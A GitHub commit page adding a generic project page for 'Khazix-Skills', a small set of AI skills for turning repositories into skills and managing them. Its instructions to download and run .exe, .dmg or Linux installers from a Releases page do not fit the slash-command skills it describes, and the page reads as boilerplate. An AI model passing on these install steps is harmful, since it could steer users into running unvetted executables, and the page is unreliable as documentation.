Skip to content

Commit 9a64269

Browse files
Commit
0 parents  commit 9a64269

1 file changed

Lines changed: 92 additions & 0 deletions

File tree

index.md

Lines changed: 92 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
---
2+
layout: "default"
3+
title: "🎉 Khazix-Skills - Effortlessly Manage Your AI Skills"
4+
description: "🤖 Transform GitHub repositories into AI skills effortlessly with tools to manage, maintain, and evolve your skill library."
5+
---
6+
# 🎉 Khazix-Skills - Effortlessly Manage Your AI Skills
7+
8+
## 📥 Download & Install
9+
10+
[![Download Khazix-Skills](https://img.shields.io/badge/Download-Khazix--Skills-blue.svg)](https://github.com/Arthur-devrole/Khazix-Skills/releases)
11+
12+
To get started with Khazix-Skills, visit the Releases page to download the latest version.
13+
14+
## 🚀 Getting Started
15+
16+
Welcome to Khazix-Skills! This is a collection of tools designed to help you manage your AI skill library. You can create, maintain, and improve your AI skills with ease. Follow the steps below to set it up.
17+
18+
### 📦 System Requirements
19+
20+
- **Operating System:** Windows, MacOS, or Linux
21+
- **RAM:** At least 4 GB
22+
- **Disk Space:** Minimum 100 MB available
23+
- **Network:** Internet connection for downloads
24+
25+
### ⚙️ Installation Steps
26+
27+
1. **Visit the Releases Page:** Go to [Releases](https://github.com/Arthur-devrole/Khazix-Skills/releases).
28+
29+
2. **Download the Installer:** Click on the latest version link labeled as "Assets" to download the appropriate file for your operating system.
30+
31+
3. **Run the Installer:**
32+
- For Windows, double-click the `.exe` file.
33+
- For MacOS, open the `.dmg` file and drag the app to your Applications folder.
34+
- For Linux, use the terminal to navigate to the folder where you downloaded the file and run the installation command.
35+
36+
4. **Follow On-Screen Instructions:** The installer will guide you through the setup process.
37+
38+
5. **Launch the Application:** You can find Khazix-Skills in your applications folder or start menu after installation.
39+
40+
## 🛠️ Skills Overview
41+
42+
| Skill | Description |
43+
|-------|-------------|
44+
| [github-to-skills](./github-to-skills/) | Converts GitHub repositories into AI skills automatically. |
45+
| [skill-manager](./skill-manager/) | Manages the skill lifecycle, which includes updates, listing, and deleting skills. |
46+
| [skill-evolution-manager](./skill-evolution-manager/) | Evolves skills based on user feedback and experience. |
47+
48+
## 🔧 Using Khazix-Skills
49+
50+
Once you have installed Khazix-Skills, you can start using its features right away.
51+
52+
### 📂 github-to-skills
53+
54+
**Automated factory for converting GitHub repositories into AI skills.**
55+
56+
#### Features
57+
- Fetches repository metadata, such as README and latest commit hash.
58+
- Creates a standardized skill directory structure.
59+
- Generates `SKILL.md` with extended frontmatter for lifecycle management.
60+
- Creates wrapper scripts for easy tool invocation.
61+
62+
#### Usage
63+
To convert a GitHub repository into a skill, run the following command in your terminal or command prompt:
64+
65+
```
66+
/github-to-skills <github_url>
67+
```
68+
69+
### 📚 Example
70+
71+
To package a specific repository into a skill, use the command:
72+
73+
```
74+
/github-to-skills https://github.com/user/repo-name
75+
```
76+
77+
## 📡 Troubleshooting
78+
79+
If you encounter issues during installation or while running the application, here are some common solutions:
80+
81+
1. **Ensure System Requirements are Met:** Check your OS, RAM, and disk space.
82+
2. **Re-download the Installer:** Sometimes files can become corrupted. Try downloading the installer again.
83+
3. **Check Your Network Connection:** Make sure you are connected to the internet for all features to work properly.
84+
4. **Consult the Documentation:** Each skill has a detailed README that provides instructions and examples.
85+
86+
## 📞 Support
87+
88+
If you need help, you can reach out through the Issues section of the GitHub repository. Describe your problem clearly so others can assist you effectively.
89+
90+
---
91+
92+
Enjoy using Khazix-Skills to streamline your AI skill management process! For more details and updates, always check the [Releases page](https://github.com/Arthur-devrole/Khazix-Skills/releases) periodically.

0 commit comments

Comments
 (0)